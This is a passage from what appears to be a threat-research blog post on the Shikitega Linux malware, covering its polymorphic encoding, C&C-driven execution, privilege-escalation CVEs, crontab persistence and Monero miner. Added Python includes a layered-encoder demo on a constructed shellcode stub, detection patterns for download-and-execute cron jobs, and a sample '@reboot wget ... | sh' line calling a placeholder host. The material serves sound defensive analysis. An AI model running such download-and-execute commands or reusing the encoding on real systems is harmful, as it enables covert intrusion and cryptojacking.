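    running key this stays at zero even for highly repetitive plaintext."""
    seen = {}
    for (c,) in struct.iter_unpack("<I", cipher):
        seen[c] = seen.get(c, 0) + 1
    return sum(1 for n in seen.values() if n > 1)


if __name__ == "__main__":
    # Constructed payload and keys; nothing here comes from a real sample.
    payload = b"\x90" * 16 + b"/bin/sh\x00"
    inner_key, outer_key = 0x5EB4C2F1, 0x0BADF00D
    wrapped = sgn_encode(sgn_encode(payload, inner_key), outer_key)
    print("repeated dwords in encoded body:", repeated_dwords(wrapped))
    print("decoded:", peel_layers(wrapped, [outer_key, inner_key]))
```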

<p>After several decryption loops, the final payload shellcode is decrypted and executed. As the malware does not use any imports, it uses &lsquo;int 0x80&rsquo; to invoke the appropriate syscall directly. Because the main dropper code is very small, the malware downloads and executes additional commands from its command and control server by calling syscall 102 (sys_socketcall) (figure 5).</p>

<p><img alt="Interrupts" data-original="https://cdn-cybersecurity.att.com/blog-content/interrupts.jpg" /></p>

<p style="text-align:center">Figure 5. Calling system functions using interrupts</p>

<p>The C&amp;C will respond with additional shell commands to execute, as seen in the packet capture in figure 6. The first bytes marked in blue are the shell commands that the malware will execute.</p>

<p><img alt="CnC commands" data-original="https://cdn-cybersecurity.att.com/blog-content/CnC_commands.jpg" /></p>

<p style="text-align:center">Figure 6. Additional commands received from C&amp;C.</p>

<p>The received command downloads additional files from the server that are not written to disk but are executed from memory only (figure 7).</p>

<p><img alt="Shikitega shell code" data-original="https://cdn-cybersecurity.att.com/blog-content/shikitega_shell_code.jpg" /></p>

<p style="text-align:center">Figure 7. Executes additional shell code received from C&amp;C.</p>

<p>Other versions of the malware use the &ldquo;execve&rdquo; syscall to execute &lsquo;/bin/sh&rsquo; with the command received from the C&amp;C (figure 8).</p>

<p><img alt="Syscall" data-original="https://cdn-cybersecurity.att.com/blog-content/syscall.jpg" /></p>

<p style="text-align:center">Figure 8. Executing shell commands by using syscall_execve.</p>

<p>The malware downloads and executes &lsquo;<a href="https://github.com/rapid7/mettle" target="_blank">Mettle</a>&rsquo;, a Metasploit meterpreter that gives the attacker a wide range of capabilities: webcam control, packet sniffing, multiple reverse shell transports (TCP/HTTP, ...), process control, shell command execution, and more.</p>

<p>In addition, the malware uses wget to download and execute the next stage dropper.</p>

<h2>Next stage dropper</h2>

<p>The next downloaded and executed file is another small ELF file (around 1 KB), encoded with the &ldquo;Shikata Ga Nai&rdquo; encoder. The malware decrypts a shell command and executes it by calling syscall_execve with &lsquo;/bin/sh&rsquo; and the decrypted command as parameters (figure 9).</p>

<p><img alt="decrypt 2" data-original="https://cdn-cybersecurity.att.com/blog-content/decrypt_2.jpg" /></p>

<p style="text-align:center">Figure 9. Second stage dropper decrypts and executes shell commands.</p>

<p>The executed shell command downloads and executes additional files. To execute the next and last stage dropper, it exploits two Linux vulnerabilities to escalate privileges: <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4034" target="_blank">CVE-2021-4034</a> and <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3493" target="_blank">CVE-2021-3493</a> (figures 10 and 11).</p>

<p><img alt="exploit linux vuln" data-original="https://cdn-cybersecurity.att.com/blog-content/exploit_linux_vuln.jpg" /></p>

<p style="text-align:center">Figure 10. Exploiting Linux vulnerability CVE-2021-3493.</p>

<p><img alt="exploit second linux vuln" data-original="https://cdn-cybersecurity.att.com/blog-content/exploit_second_linux_vuln.jpg" /></p>

<p style="text-align:center">Figure 11. Exploiting CVE-2021-4034 vulnerability.</p>

<p>The malware uses the exploit to download and execute the final stage, the persistence scripts and the cryptominer payload, with root privileges.</p>

<h2>Persistence</h2>

<p>To achieve persistence, the malware downloads and executes a total of 5 shell scripts. It persists on the system by setting 4 crontabs, two for the currently logged-in user and two for the root user. It first checks whether the crontab command exists on the machine; if not, the malware installs it and starts the crontab service.</p>

<p>To make sure only one instance is running, it will use the <a href="https://linux.die.net/man/2/flock">flock</a> command with a lock file &ldquo;/var/tmp/vm.lock&rdquo;.</p>

<p><img alt="flock command" data-original="https://cdn-cybersecurity.att.com/blog-content/flock_command.jpg" /></p>

<p style="text-align:center">Figure 12. Adding root crontab to execute the final payload.</p>

<p>Below is the list of scripts downloaded and executed to achieve persistence:</p>

<table style="border-collapse:collapse">
	<thead>
		<tr>
			<td style="border-bottom:1px solid black; border-left:1px solid black; border-right:1px solid black; border-top:1px solid black; width:312px">
			<p style="text-align:center">script name</p>
			</td>
			<td style="border-bottom:1px solid black; border-left:none; border-right:1px solid black; border-top:1px solid black; width:312px">
			<p style="text-align:center">details</p>
			</td>
		</tr>
	</thead>
	<tbody>
		<tr>
			<td style="border-bottom:1px solid black; border-left:1px solid black; border-right:1px solid black; border-top:none; width:312px">
			<p>unix.sh</p>
			</td>
			<td style="border-bottom:1px solid black; border-left:none; border-right:1px solid black; border-top:none; width:312px">
			<p>Checks whether the &ldquo;crontab&rdquo; command exists on the system; if not, installs it and starts the crontab service.</p>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:1px solid black; border-left:1px solid black; border-right:1px solid black; border-top:none; width:312px">
			<p>brict.sh</p>
			</td>
			<td style="border-bottom:1px solid black; border-left:none; border-right:1px solid black; border-top:none; width:312px">
			<p>Adds crontab for current user to execute cryptominer.</p>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:1px solid black; border-left:1px solid black; border-right:1px solid black; border-top:none; width:312px">
			<p>politrict.sh</p>
			</td>
			<td style="border-bottom:1px solid black; border-left:none; border-right:1px solid black; border-top:none; width:312px">
			<p>Adds root crontab to execute cryptominer.</p>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:1px solid black; border-left:1px solid black; border-right:1px solid black; border-top:none; width:312px">
			<p>truct.sh</p>
			</td>
			<td style="border-bottom:1px solid black; border-left:none; border-right:1px solid black; border-top:none; width:312px">
			<p>Adds crontab for current user to download cryptominer and config from C&amp;C.</p>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:1px solid black; border-left:1px solid black; border-right:1px solid black; border-top:none; width:312px">
			<p>restrict.sh</p>
			</td>
			<td style="border-bottom:1px solid black; border-left:none; border-right:1px solid black; border-top:none; width:312px">
			<p>Adds root crontab to download cryptominer and config from C&amp;C.</p>
			</td>
		</tr>
	</tbody>
</table>


<p>Once persistence through crontabs is in place, the malware deletes all downloaded files from the system to hide its presence.</p>
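<p>Because the downloaded files are deleted and only the crontab entries remain, the crontabs themselves are the durable artifact to audit. The following Python, added for this write-up (it is neither the malware's scripts nor Alien Labs tooling), flags cron jobs with the traits described above: download-and-execute chains, payloads run from /tmp or /var/tmp, and a flock guard on a .lock file. It works on crontab text passed in as a string, so it assumes you feed it the output of <code>crontab -l</code> for root and every login user; the sample crontab inside it is constructed, and its download host is a placeholder rather than a real indicator.</p>

```python
"""Audit crontab text for the traits of the Shikitega persistence stage.

Added example for this write-up; not the malware's scripts and not AT&T Alien
Labs tooling. audit_crontab() takes crontab text as a string so it can be run
over 'crontab -l' output for each account (root included, since the write-up
describes two crontabs for root and two for the logged-in user) and over
/etc/cron* files. The sample crontab at the bottom is constructed.
"""
import re

# Traits from the write-up: jobs that download and execute, payloads run from
# /tmp or /var/tmp, and a flock guard with a .lock file (e.g. /var/tmp/vm.lock).
DOWNLOADER = re.compile(r"\b(wget|curl)\b")
EXEC_CHAIN = re.compile(r"\|\s*(ba)?sh\b|&&\s*(chmod|\./|sh\b|bash\b)")
TMP_PATH = re.compile(r"/(var/)?tmp/")
FLOCK_LOCK = re.compile(r"\bflock\b[^;&|]*?(/\S+\.lock)")


def parse_crontab(text):
    """Yield (line_no, schedule, command) for each job line, skipping comments,
    blank lines and VAR=value assignments; handles @reboot-style schedules."""
    for n, line in enumerate(text.splitlines(), 1):
        s = line.strip()
        if not s or s.startswith("#") or re.match(r"\w+=", s):
            continue
        if s.startswith("@"):                      # @reboot, @hourly, ...
            sched, _, cmd = s.partition(" ")
        else:
            parts = s.split(None, 5)               # five time fields + command
            if len(parts) < 6:
                continue                           # malformed line, ignore
            sched, cmd = " ".join(parts[:5]), parts[5]
        yield n, sched, cmd.strip()


def audit_crontab(text, owner):
    """Return one finding per suspicious job: owner, line number, schedule,
    command and the list of reasons it was flagged (empty list if clean)."""
    findings = []
    for n, sched, cmd in parse_crontab(text):
        reasons = []
        if DOWNLOADER.search(cmd):
            reasons.append("download-and-execute" if EXEC_CHAIN.search(cmd)
                           else "downloader in cron")
        if TMP_PATH.search(cmd):
            reasons.append("runs from tmp")
        m = FLOCK_LOCK.search(cmd)
        if m:
            reasons.append("flock guard " + m.group(1))
        if reasons:
            findings.append({"owner": owner, "line": n, "schedule": sched,
                             "command": cmd, "reasons": reasons})
    return findings


def audit_all(crontabs):
    """Audit an {owner: crontab_text} mapping, e.g. root plus every login user,
    since the persistence described above is split across both."""
    out = []
    for owner, text in crontabs.items():
        out.extend(audit_crontab(text, owner))
    return out


# Constructed sample: one benign job next to two jobs shaped like the
# persistence described in the write-up. The lock file name is the one the
# write-up reports; the download host is a placeholder, not a real indicator.
SAMPLE_ROOT_CRONTAB = """\
# constructed sample, not a real capture
MAILTO=""
0 3 * * * /usr/bin/certbot renew --quiet
*/10 * * * * flock -n /var/tmp/vm.lock /var/tmp/.cache/run.sh >/dev/null 2>&1
@reboot wget -q -O- http://c2.example.invalid/x | sh
"""

if __name__ == "__main__":
    for f in audit_all({"root": SAMPLE_ROOT_CRONTAB}):
        print(f"{f['owner']} line {f['line']} [{f['schedule']}]: "
              f"{', '.join(f['reasons'])} :: {f['command']}")
```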

<h2>Cryptominer payload</h2>

<p>The malware downloads and executes the XMRig miner, a popular miner for the Monero cryptocurrency. It also sets a crontab to download and execute the crypto miner and its config from the C&amp;C, as mentioned in the persistence section above.</p>

<p><img alt="XMRig" data-original="https://cdn-cybersecurity.att.com/blog-content/xmrig.jpg" /></p>

<p style="text-align:center">Figure 13. XMRig miner is downloaded and executed on an infected machine.</p>

<h2>Command and control</h2>

<p>Shikitega uses cloud solutions to host some of its command and control servers (C&amp;C), as shown by <a href="https://otx.alienvault.com/indicator/hostname/dash.cloudflare.ovh" target="_blank">OTX</a> in figure 14. Because in some cases the malware contacts the command and control server directly by IP address rather than by domain name, it is difficult to provide a complete list of indicators for detection: such addresses are volatile and will be reused for legitimate purposes within a short period of time.</p>

<p><img alt="CnC on legit host" data-original="https://cdn-cybersecurity.att.com/blog-content/cnc_on_legit_host.jpg" /></p>

<p style="text-align:center">Figure 14. Command and control server hosted on a legitimate cloud hosting service.</p>

<h2>Recommended actions</h2>

<ol>
	<li>Keep software up to date with security updates.</li>
	<li>Install antivirus and/or EDR on all endpoints.</li>
	<li>Use a backup system to back up server files.</li>
</ol>

<h2>Conclusion</h2>

<p>Threat actors continue to search for new ways to deliver malware, stay under the radar and avoid detection. Shikitega is delivered in a sophisticated way: it uses a polymorphic encoder and delivers its payload gradually, where each step reveals only part of the total payload. In addition, the malware abuses known hosting services to host its command and control servers. Stay safe!</p>

<h2>Associated Indicators (IOCs)</h2>

<p>The following technical indicators are associated with the reported intelligence. A list of indicators is also available in the <a href="https://otx.alienvault.com/pulse/630e1e801a01e2ba23ed7f44" target="_blank">OTX Pulse</a>. Please note, the pulse may include other activities related but out of the scope of the report.</p>


<h2>Mapped to MITRE ATT&amp;CK</h2>

<p>The findings of this report are mapped to the following <a href="https://attack.mitre.org/" target="_blank">MITRE ATT&amp;CK Matrix</a> techniques:</p>

<ul>
	<li>TA0002: Execution
	<ul>
		<li>T1059: Command and Scripting Interpreter</li>
		<li>T1569: System Services
		<ul>
			<li>T1569.002: Service Execution</li>
		</ul>
		</li>
	</ul>
	</li>
	<li>TA0003: Persistence
	<ul>
		<li>T1543: Create or Modify System Process</li>
	</ul>
	</li>
	<li>TA0005: Defense Evasion
	<ul>
		<li>T1027: Obfuscated Files or Information</li>
	</ul>
	</li>
</ul>
									</div>
								</div>

							</div>
							
						</div>
					</div>
				</section>


			</main>


			

			
		








		




</body>
</html>